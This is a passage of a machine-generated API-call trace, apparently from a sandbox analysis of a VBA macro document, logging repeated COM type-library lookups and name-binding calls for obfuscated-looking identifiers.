lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.240] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.240] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.240] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.240] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.240] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.240] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.240] IUnknown:Release (This=0x665ba50) returned 0xd [0069.240] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.241] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.241] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.241] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.241] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.241] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.241] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.241] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.241] IUnknown:Release (This=0x665ba50) returned 0xd [0069.241] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.241] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.241] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.241] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.241] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.241] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.241] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.241] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.241] IUnknown:Release (This=0x665ba50) returned 0xd [0069.241] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.241] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.241] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.241] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.241] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.241] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.242] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.242] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.242] IUnknown:Release (This=0x665ba50) returned 0xd [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.242] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.242] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.242] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.242] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.242] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.242] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.242] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.242] IUnknown:Release (This=0x665ba50) returned 0xd [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.242] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.242] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.242] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.242] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.243] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.243] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.243] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.243] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.243] IUnknown:Release (This=0x665ba50) returned 0xd [0069.243] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.243] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.243] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.243] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lCwAwx4Z") returned 9 [0069.243] ITypeComp:RemoteBind (in: This=0x665ba60, szName="lCwAwx4Z", lHashVal=0x107941, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lCwAwx4Z") returned 9 [0069.243] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="lCwAwx4Z", lHashVal=0x107941, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lCwAwx4Z") returned 9 [0069.243] ITypeComp:RemoteBind (in: This=0x665bd30, szName="lCwAwx4Z", lHashVal=0x107941, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.243] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="lCwAwx4Z") returned 0x107941 [0069.243] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="lCwAwx4Z" | out: _Dst="lCwAwx4Z") returned 0x0 [0069.243] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="lCwAwx4Z") returned 9 [0069.243] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.244] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="lCwAwx4Z", lHashVal=0x107941, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.244] IUnknown:Release (This=0x665ba50) returned 0xd [0069.244] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.244] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="lCwAwx4Z", lHashVal=0x107941, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.244] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.244] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.244] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="lCwAwx4Z", lHashVal=0x107941, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.244] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.244] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.244] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="lCwAwx4Z", lHashVal=0x107941, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.244] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62dee, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="lCwAwx4Z") returned 9 [0069.244] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="lCwAwx4Z", lHashVal=0x107941, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.244] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.244] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62dee | out: _Dst=0x67c2d40) returned 0x0 [0069.244] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_lCwAwx4Z") returned 0x1050ca [0069.244] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_lCwAwx4Z" | out: _Dst="_B_var_lCwAwx4Z") returned 0x0 [0069.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_lCwAwx4Z") returned 16 [0069.244] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.244] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_lCwAwx4Z", lHashVal=0x1050ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.244] IUnknown:Release (This=0x665ba50) returned 0xd [0069.244] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.244] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_lCwAwx4Z", lHashVal=0x1050ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.244] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.244] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.244] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_lCwAwx4Z", lHashVal=0x1050ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.244] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.245] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.245] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_lCwAwx4Z", lHashVal=0x1050ca, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.245] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.245] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.245] IUnknown:Release (This=0x665ba50) returned 0xd [0069.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11d5e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_lCwAwx4Z") returned 16 [0069.245] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_lCwAwx4Z", lHashVal=0x1050ca, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6c005f00720061, ppTypeComp=0x77004100000000, pDummy=0x0) returned 0x0 [0069.245] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62dee | out: _Dst=0x144ec0) returned 0x0 [0069.245] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dA_QAUBA", lHashVal=0x10a991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ef2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dA_QAUBA") returned 9 [0069.245] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dA_QAUBA", lHashVal=0x10a991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ef2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dA_QAUBA") returned 9 [0069.245] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dA_QAUBA", lHashVal=0x10a991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.245] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dA_QAUBA") returned 0x10a991 [0069.245] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="dA_QAUBA" | out: _Dst="dA_QAUBA") returned 0x0 [0069.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="dA_QAUBA") returned 9 [0069.245] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.246] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dA_QAUBA", lHashVal=0x10a991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.246] IUnknown:Release (This=0x665ba50) returned 0xd [0069.246] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.246] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dA_QAUBA", lHashVal=0x10a991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.246] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.246] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.246] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dA_QAUBA", lHashVal=0x10a991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.246] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.246] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.246] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dA_QAUBA", lHashVal=0x10a991, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.246] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ef2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="dA_QAUBA") returned 9 [0069.246] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dA_QAUBA", lHashVal=0x10a991, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.246] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.246] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a62ef2 | out: _Dst=0x67c2d40) returned 0x0 [0069.246] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dA_QAUBA") returned 0x10811a [0069.246] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_dA_QAUBA" | out: _Dst="_B_var_dA_QAUBA") returned 0x0 [0069.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_dA_QAUBA") returned 16 [0069.246] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.246] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dA_QAUBA", lHashVal=0x10811a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.246] IUnknown:Release (This=0x665ba50) returned 0xd [0069.246] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.246] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dA_QAUBA", lHashVal=0x10811a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.246] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.246] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.246] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dA_QAUBA", lHashVal=0x10811a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.246] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.247] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.247] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dA_QAUBA", lHashVal=0x10811a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.247] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.247] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.247] IUnknown:Release (This=0x665ba50) returned 0xd [0069.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b11d8e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_dA_QAUBA") returned 16 [0069.247] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_dA_QAUBA", lHashVal=0x10811a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x64005f00720061, ppTypeComp=0x41005100000000, pDummy=0x0) returned 0x0 [0069.247] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a62ef2 | out: _Dst=0x144ec0) returned 0x0 [0069.247] ITypeComp:RemoteBind (in: This=0x665ba60, szName="wABAcZDG", lHashVal=0x109baf, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62ec6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="wABAcZDG") returned 9 [0069.247] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="wABAcZDG", lHashVal=0x109baf, 